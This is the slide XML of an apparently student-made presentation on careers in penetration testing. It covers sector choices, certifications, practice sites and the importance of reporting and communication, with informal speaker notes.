          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-15">
            <a:off x="7751679" y="2868163"/>
            <a:ext cx="1332441" cy="1210678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Google Shape;65;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6237747" y="2444409"/>
            <a:ext cx="1513926" cy="1513926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Google Shape;66;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="745899">
            <a:off x="6932282" y="2135750"/>
            <a:ext cx="1905555" cy="73839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Potential Careers in Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;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t>Public sector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - government-owned orgs / government services</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Private sector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - not owned by the government</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Different ways of doing things</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Job requirements, technology used, compensation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>volatility</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Specific company (Walmart) vs. contracting (“hack the planet”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pen test the company you work for. Help make their systems better</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OR pen test many other companies. “I hack Fortune 100 companies all the time”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Contracting = cooler? More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>satisfying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>? Depends on you. Could be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>volatile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="Google Shape;193;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352150" y="2331678"/>
            <a:ext cx="480150" cy="480150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="Google Shape;194;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3097338" y="3530700"/>
            <a:ext cx="2949325" cy="1510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Google Shape;199;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="892763" y="432950"/>
            <a:ext cx="7358475" cy="42775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Certifications</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;20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Possible path:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://overthewire.org/wargames/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.vulnhub.com/#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="A4C2F4"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.hackthebox.eu/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Penetration Testing with Kali Linux course by Offensive Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Offensive Security Certified Professional (OSCP) 24-hour exam</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Google Shape;206;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195250" y="245300"/>
            <a:ext cx="3637050" cy="23713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Beyond Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;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It’s cool stuff. But there’s more to a business, especially in the private sector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security Engineer / Security Architect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g., TIAA teams</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Multiple people working with several different security products</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Specializing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Good at comms and have the educational background? You move up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>VERY QUICKLY</a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="213" name="Google Shape;213;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="51075" y="3257888"/>
            <a:ext cx="2780199" cy="1853475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="214" name="Google Shape;214;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3724275" y="3415925"/>
            <a:ext cx="1695450" cy="1695450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Google Shape;215;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087100" y="3257900"/>
            <a:ext cx="1774474" cy="1774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Being able to explain technical things in a non-technical way to non-technical people</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“NEED MORE COMMS”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Further Steps</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I am a noob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There’s so much to learn</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(as is the case in any area of the computing profession)</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Self-learning is important. Research it yourself</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E.g., graduate students</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Passion, putting in the extra effort</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E.g., learning new tools! Show how and why it works</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="227" name="Google Shape;227;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5889925" y="2142522"/>
            <a:ext cx="2942375" cy="26702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200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you!</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="6AA84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Inspiration from that pro pen tester guy who gave that webex talk 2 years ago and some other Scheiße (NOTES)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;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Passion (for anything that you get into) - put in the extra effort like, e.g., learning a new tools… OR</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>ATTEND THE CYBERSECURITY CLUB -&gt; LEARN NEW, RAD THINGS ABOUT FIELD -&gt; DO FUN STUFF WITH YOUR NEW FRIENDS (CONFERENCES, CTFS, ETC… networking is valuable in any field :) ) -&gt; IT’S A WIN-WIN SCHLAMPE AND YOU GIT GUD TOO</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Learn from experience… classes only really teach you theory (DB class and real-life data warehouse example)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Demonstrating you can do stuff is cool, but it’s more valuable if you know HOW and WHY it works</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Being able to explain technical things in a non-technical way to non-technical people (the key to success tbh. higher-ups are good at this). (remember, just like the reporting at the end of a pen test. most important part.)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Tell your people which doors are open and this is pretty much what you’re getting paid for YOU MUST WRITE A GOOD REPORT AND BE ABLE TO COMM WITH BISOS / BUSINESS PPL / YOUR CLIENT</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>LITERALLY NEED MORE COMMS OR YOU LOSE</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Tell them what to do to fix their doors (buy new stuffs -&gt; recommend a product OR tell their blue team to git gud and fix the infrastructure)</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Have a structure to your reporting; make it easy to read</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1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42" name="Shape 242"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;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TODO, Things to say (NOTES)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;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73050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>I guess open with the analogy - explain the field of pen testing at a high level (pls be noob friendly, especially if we have noobs. I think we will have noobs. Honestly I’m a noob at this)</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Go through the phases of penetration testing (PTES) - DEMO OF ONE TOOL FOR EACH STEP (MOSTLY)</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Explain technical specifications / skills required to do this</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Linux cmds</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Kali tools for general use pentesting</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>specializing in one specific area of pen testing like exploiting web apps, mobile apps, whatever</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Outline some of the tools to use for these, but don’t make it the focus of the presentation you schlampe // look into this more; there are definitely resources</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>The OSCP is a cert that shows practical exp unlike baby stuff (relatively… baby stuff still good to have for babies like me) that is Sec+ / CEH / whatever (just MC exams) (also GPEN and LPT are good too and LPT is the pinnacle I think?</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Nowadays they have the CEH Practical and ECSA (EC-Council Certified Security Analyst) Practical (the latter is actually more about defense / blue team)… they’re still babies to the pinnacle that is the OSCP / LPT / whatever you want to get. z.B. spend 6 hours in the iLabs cyber range rooting boxes (CEH Practical) compared to the 24 hours / 25-30/55 boxes</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
